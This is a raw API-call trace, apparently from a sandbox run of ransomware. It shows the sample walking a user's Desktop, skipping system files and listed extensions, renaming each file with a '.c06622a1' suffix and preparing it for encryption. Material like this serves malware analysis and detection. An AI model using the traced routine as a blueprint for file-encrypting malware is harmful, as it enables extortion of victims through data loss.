[0147.680] _wcsicmp (_Str1="autorun.inf", _Str2="dOl_g7LT8L5bk.flv") returned -3 [0147.680] wcslen (_String="autorun.inf") returned 0xb [0147.680] _wcsicmp (_Str1="boot.ini", _Str2="dOl_g7LT8L5bk.flv") returned -2 [0147.680] wcslen (_String="boot.ini") returned 0x8 [0147.680] _wcsicmp (_Str1="bootfont.bin", _Str2="dOl_g7LT8L5bk.flv") returned -2 [0147.680] wcslen (_String="bootfont.bin") returned 0xc [0147.680] _wcsicmp (_Str1="bootsect.bak", _Str2="dOl_g7LT8L5bk.flv") returned -2 [0147.680] wcslen (_String="bootsect.bak") returned 0xc [0147.680] _wcsicmp (_Str1="desktop.ini", _Str2="dOl_g7LT8L5bk.flv") returned -10 [0147.680] wcslen (_String="desktop.ini") returned 0xb [0147.680] _wcsicmp (_Str1="iconcache.db", _Str2="dOl_g7LT8L5bk.flv") returned 5 [0147.680] wcslen (_String="iconcache.db") returned 0xc [0147.680] _wcsicmp (_Str1="ntldr", _Str2="dOl_g7LT8L5bk.flv") returned 10 [0147.680] wcslen (_String="ntldr") returned 0x5 [0147.680] _wcsicmp (_Str1="ntuser.dat", _Str2="dOl_g7LT8L5bk.flv") returned 10 [0147.680] wcslen (_String="ntuser.dat") returned 0xa [0147.680] _wcsicmp (_Str1="ntuser.dat.log", _Str2="dOl_g7LT8L5bk.flv") returned 10 [0147.680] wcslen (_String="ntuser.dat.log") returned 0xe [0147.680] _wcsicmp (_Str1="ntuser.ini", _Str2="dOl_g7LT8L5bk.flv") returned 10 [0147.680] wcslen (_String="ntuser.ini") returned 0xa [0147.680] _wcsicmp (_Str1="thumbs.db", _Str2="dOl_g7LT8L5bk.flv") returned 16 [0147.680] wcslen (_String="thumbs.db") returned 0x9 [0147.680] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0147.680] wcslen (_String="386") returned 0x3 [0147.680] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0147.680] wcslen (_String="adv") returned 0x3 [0147.681] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0147.681] wcslen (_String="ani") returned 0x3 [0147.681] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0147.681] wcslen (_String="bat") returned 0x3 [0147.681] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0147.681] wcslen (_String="bin") returned 0x3 [0147.681] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0147.681] wcslen (_String="cab") returned 0x3 [0147.681] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0147.681] wcslen (_String="cmd") returned 0x3 [0147.681] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0147.681] wcslen (_String="com") returned 0x3 [0147.681] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0147.681] wcslen (_String="cpl") returned 0x3 [0147.681] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0147.681] wcslen (_String="cur") returned 0x3 [0147.681] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0147.681] wcslen (_String="deskthemepack") returned 0xd [0147.681] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0147.681] wcslen (_String="diagcab") returned 0x7 [0147.681] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0147.681] wcslen (_String="diagcfg") returned 0x7 [0147.681] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0147.681] wcslen (_String="diagpkg") returned 0x7 [0147.681] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0147.681] wcslen (_String="dll") returned 0x3 [0147.681] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0147.681] wcslen (_String="drv") returned 0x3 [0147.681] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0147.681] wcslen (_String="exe") returned 0x3 [0147.681] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0147.682] wcslen (_String="hlp") returned 0x3 [0147.682] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0147.682] wcslen (_String="icl") returned 0x3 [0147.682] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0147.682] wcslen (_String="icns") returned 0x4 [0147.682] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0147.682] wcslen (_String="ico") returned 0x3 [0147.682] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0147.682] wcslen (_String="ics") returned 0x3 [0147.682] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0147.682] wcslen (_String="idx") returned 0x3 [0147.682] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0147.682] wcslen (_String="ldf") returned 0x3 [0147.682] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0147.682] wcslen (_String="lnk") returned 0x3 [0147.682] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0147.682] wcslen (_String="mod") returned 0x3 [0147.682] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0147.682] wcslen (_String="mpa") returned 0x3 [0147.682] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0147.682] wcslen (_String="msc") returned 0x3 [0147.682] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0147.682] wcslen (_String="msp") returned 0x3 [0147.682] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0147.682] wcslen (_String="msstyles") returned 0x8 [0147.682] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0147.682] wcslen (_String="msu") returned 0x3 [0147.682] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0147.682] wcslen (_String="nls") returned 0x3 [0147.682] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0147.683] wcslen (_String="nomedia") returned 0x7 [0147.683] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0147.683] wcslen (_String="ocx") returned 0x3 [0147.683] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0147.683] wcslen (_String="prf") returned 0x3 [0147.683] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0147.683] wcslen (_String="ps1") returned 0x3 [0147.683] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0147.683] wcslen (_String="rom") returned 0x3 [0147.683] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0147.683] wcslen (_String="rtp") returned 0x3 [0147.683] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0147.683] wcslen (_String="scr") returned 0x3 [0147.683] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0147.683] wcslen (_String="shs") returned 0x3 [0147.683] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0147.683] wcslen (_String="spl") returned 0x3 [0147.683] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0147.683] wcslen (_String="sys") returned 0x3 [0147.683] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0147.683] wcslen (_String="theme") returned 0x5 [0147.683] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0147.683] wcslen (_String="themepack") returned 0x9 [0147.683] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0147.683] wcslen (_String="wpx") returned 0x3 [0147.683] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0147.683] wcslen (_String="lock") returned 0x4 [0147.683] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0147.683] wcslen (_String="key") returned 0x3 [0147.683] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0147.683] wcslen (_String="hta") returned 0x3 [0147.684] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0147.684] wcslen (_String="msi") returned 0x3 [0147.684] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0147.684] wcslen (_String="pdb") returned 0x3 [0147.684] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0147.684] wcslen (_String="sql") returned 0x3 [0147.684] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0147.684] wcslen (_String="sqlite") returned 0x6 [0147.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.684] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.684] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.684] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.684] wcscpy (in: _Dest=0x44d00cc, _Source="dOl_g7LT8L5bk.flv" | out: _Dest="dOl_g7LT8L5bk.flv") returned="dOl_g7LT8L5bk.flv" [0147.684] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv", dwFileAttributes=0x80) returned 1 [0147.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dol_g7lt8l5bk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0147.685] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.685] ReadFile (in: hFile=0x648, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.686] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xb10bd634 [0147.686] RtlComputeCrc32 (PartialCrc=0xd634, Buffer=0x3feb74, Length=0x80) returned 0x544100b7 [0147.686] RtlComputeCrc32 (PartialCrc=0xb7, Buffer=0x3feb74, Length=0x80) returned 0xeaccbe09 [0147.686] RtlComputeCrc32 (PartialCrc=0xbe09, Buffer=0x3feb74, Length=0x80) returned 0xff2b052f [0147.686] RtlComputeCrc32 (PartialCrc=0x52f, Buffer=0x3feb74, Length=0x80) returned 0xba53a97c [0147.686] CloseHandle (hObject=0x648) returned 1 [0147.686] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.686] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv" [0147.686] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv") returned 0x3b [0147.686] wcscpy (in: _Dest=0x44e00f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.686] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dol_g7lt8l5bk.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dol_g7lt8l5bk.flv.c06622a1"), dwFlags=0x8) returned 1 [0147.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dOl_g7LT8L5bk.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dol_g7lt8l5bk.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0147.693] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.693] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x114c2082 [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fffb80b [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x666e6ac [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73230ba [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3c5d1669 [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64c64ce5 [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x618a7f88 [0147.700] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2358c7f5 [0147.703] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0xceff7f1a [0147.703] RtlComputeCrc32 (PartialCrc=0x7f1a, Buffer=0x4af0094, Length=0x80) returned 0x93b63c29 [0147.703] RtlComputeCrc32 (PartialCrc=0x3c29, Buffer=0x4af0094, Length=0x80) returned 0x7e24537 [0147.703] RtlComputeCrc32 (PartialCrc=0x4537, Buffer=0x4af0094, Length=0x80) returned 0x19e4524d [0147.703] RtlComputeCrc32 (PartialCrc=0x524d, Buffer=0x4af0094, Length=0x80) returned 0x5beef7db [0147.703] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0147.703] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.703] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.703] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d838d0, ftCreationTime.dwHighDateTime=0x1d5e4cc, ftLastAccessTime.dwLowDateTime=0xa0403a10, ftLastAccessTime.dwHighDateTime=0x1d5dfeb, ftLastWriteTime.dwLowDateTime=0xa0403a10, ftLastWriteTime.dwHighDateTime=0x1d5dfeb, nFileSizeHigh=0x0, nFileSizeLow=0x10ff8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GBJcqG InHDIXWX7aw2.mkv", cAlternateFileName="GBJCQG~1.MKV")) returned 1 [0147.703] _wcsicmp (_Str1="GBJcqG InHDIXWX7aw2.mkv", _Str2="README.c06622a1.TXT") returned -11 [0147.703] wcsstr (_Str="GBJcqG InHDIXWX7aw2.mkv", _SubStr="README") returned 0x0 [0147.703] _wcsicmp (_Str1="autorun.inf", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned -6 [0147.703] wcslen (_String="autorun.inf") returned 0xb [0147.703] _wcsicmp (_Str1="boot.ini", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned -5 [0147.703] wcslen (_String="boot.ini") returned 0x8 [0147.704] _wcsicmp (_Str1="bootfont.bin", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned -5 [0147.704] wcslen (_String="bootfont.bin") returned 0xc [0147.704] _wcsicmp (_Str1="bootsect.bak", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned -5 [0147.704] wcslen (_String="bootsect.bak") returned 0xc [0147.704] _wcsicmp (_Str1="desktop.ini", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned -3 [0147.704] wcslen (_String="desktop.ini") returned 0xb [0147.704] _wcsicmp (_Str1="iconcache.db", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned 2 [0147.704] wcslen (_String="iconcache.db") returned 0xc [0147.704] _wcsicmp (_Str1="ntldr", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned 7 [0147.704] wcslen (_String="ntldr") returned 0x5 [0147.704] _wcsicmp (_Str1="ntuser.dat", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned 7 [0147.704] wcslen (_String="ntuser.dat") returned 0xa [0147.704] _wcsicmp (_Str1="ntuser.dat.log", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned 7 [0147.704] wcslen (_String="ntuser.dat.log") returned 0xe [0147.704] _wcsicmp (_Str1="ntuser.ini", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned 7 [0147.704] wcslen (_String="ntuser.ini") returned 0xa [0147.704] _wcsicmp (_Str1="thumbs.db", _Str2="GBJcqG InHDIXWX7aw2.mkv") returned 13 [0147.704] wcslen (_String="thumbs.db") returned 0x9 [0147.704] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0147.704] wcslen (_String="386") returned 0x3 [0147.704] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0147.704] wcslen (_String="adv") returned 0x3 [0147.704] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0147.704] wcslen (_String="ani") returned 0x3 [0147.704] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0147.705] wcslen (_String="bat") returned 0x3 [0147.705] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0147.705] wcslen (_String="bin") returned 0x3 [0147.705] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0147.705] wcslen (_String="cab") returned 0x3 [0147.705] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0147.705] wcslen (_String="cmd") returned 0x3 [0147.705] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0147.705] wcslen (_String="com") returned 0x3 [0147.705] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0147.705] wcslen (_String="cpl") returned 0x3 [0147.705] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0147.705] wcslen (_String="cur") returned 0x3 [0147.705] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0147.705] wcslen (_String="deskthemepack") returned 0xd [0147.705] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0147.705] wcslen (_String="diagcab") returned 0x7 [0147.705] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0147.705] wcslen (_String="diagcfg") returned 0x7 [0147.705] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0147.705] wcslen (_String="diagpkg") returned 0x7 [0147.705] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0147.705] wcslen (_String="dll") returned 0x3 [0147.705] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0147.705] wcslen (_String="drv") returned 0x3 [0147.705] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0147.705] wcslen (_String="exe") returned 0x3 [0147.706] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0147.706] wcslen (_String="hlp") returned 0x3 [0147.706] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0147.706] wcslen (_String="icl") returned 0x3 [0147.706] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0147.706] wcslen (_String="icns") returned 0x4 [0147.706] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0147.706] wcslen (_String="ico") returned 0x3 [0147.706] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0147.706] wcslen (_String="ics") returned 0x3 [0147.706] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0147.706] wcslen (_String="idx") returned 0x3 [0147.706] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0147.706] wcslen (_String="ldf") returned 0x3 [0147.706] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0147.706] wcslen (_String="lnk") returned 0x3 [0147.706] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0147.706] wcslen (_String="mod") returned 0x3 [0147.706] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0147.706] wcslen (_String="mpa") returned 0x3 [0147.706] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0147.706] wcslen (_String="msc") returned 0x3 [0147.706] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0147.706] wcslen (_String="msp") returned 0x3 [0147.706] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0147.706] wcslen (_String="msstyles") returned 0x8 [0147.706] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0147.707] wcslen (_String="msu") returned 0x3 [0147.707] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0147.707] wcslen (_String="nls") returned 0x3 [0147.707] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0147.707] wcslen (_String="nomedia") returned 0x7 [0147.707] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0147.707] wcslen (_String="ocx") returned 0x3 [0147.707] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0147.707] wcslen (_String="prf") returned 0x3 [0147.707] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0147.707] wcslen (_String="ps1") returned 0x3 [0147.707] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0147.707] wcslen (_String="rom") returned 0x3 [0147.707] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0147.707] wcslen (_String="rtp") returned 0x3 [0147.707] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0147.707] wcslen (_String="scr") returned 0x3 [0147.707] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0147.707] wcslen (_String="shs") returned 0x3 [0147.707] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0147.707] wcslen (_String="spl") returned 0x3 [0147.707] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0147.707] wcslen (_String="sys") returned 0x3 [0147.707] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0147.707] wcslen (_String="theme") returned 0x5 [0147.707] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0147.707] wcslen (_String="themepack") returned 0x9 [0147.708] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0147.708] wcslen (_String="wpx") returned 0x3 [0147.708] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0147.708] wcslen (_String="lock") returned 0x4 [0147.708] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0147.708] wcslen (_String="key") returned 0x3 [0147.708] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0147.708] wcslen (_String="hta") returned 0x3 [0147.708] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0147.708] wcslen (_String="msi") returned 0x3 [0147.708] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0147.708] wcslen (_String="pdb") returned 0x3 [0147.708] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0147.708] wcslen (_String="sql") returned 0x3 [0147.708] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0147.708] wcslen (_String="sqlite") returned 0x6 [0147.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.708] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.708] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.708] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.708] wcscpy (in: _Dest=0x44d00cc, _Source="GBJcqG InHDIXWX7aw2.mkv" | out: _Dest="GBJcqG InHDIXWX7aw2.mkv") returned="GBJcqG InHDIXWX7aw2.mkv" [0147.708] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv", dwFileAttributes=0x80) returned 1 [0147.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gbjcqg inhdixwx7aw2.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64c [0147.726] SetFilePointerEx (in: hFile=0x64c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.726] ReadFile (in: hFile=0x64c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.727] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xb467af92 [0147.727] RtlComputeCrc32 (PartialCrc=0xaf92, Buffer=0x3feb74, Length=0x80) returned 0x3a07e4b7 [0147.727] RtlComputeCrc32 (PartialCrc=0xe4b7, Buffer=0x3feb74, Length=0x80) returned 0x13925163 [0147.727] RtlComputeCrc32 (PartialCrc=0x5163, Buffer=0x3feb74, Length=0x80) returned 0x8eb2d900 [0147.727] RtlComputeCrc32 (PartialCrc=0xd900, Buffer=0x3feb74, Length=0x80) returned 0xb31c157b [0147.727] CloseHandle (hObject=0x64c) returned 1 [0147.727] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.727] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv" [0147.727] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv") returned 0x41 [0147.727] wcscpy (in: _Dest=0x44e0102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.727] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gbjcqg inhdixwx7aw2.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gbjcqg inhdixwx7aw2.mkv.c06622a1"), dwFlags=0x8) returned 1 [0147.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GBJcqG InHDIXWX7aw2.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gbjcqg inhdixwx7aw2.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x64c [0147.779] CreateIoCompletionPort (FileHandle=0x64c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.779] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0147.784] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x11587447 [0147.784] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1099a974 [0147.784] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fffa63d [0147.784] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x880ea08 [0147.784] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1745d6af [0147.785] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x509ac23c [0147.785] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b81d1a [0147.785] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c33e46f [0147.788] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x2219f8d6 [0147.788] RtlComputeCrc32 (PartialCrc=0xf8d6, Buffer=0x2f30094, Length=0x80) returned 0x4eef565d [0147.788] 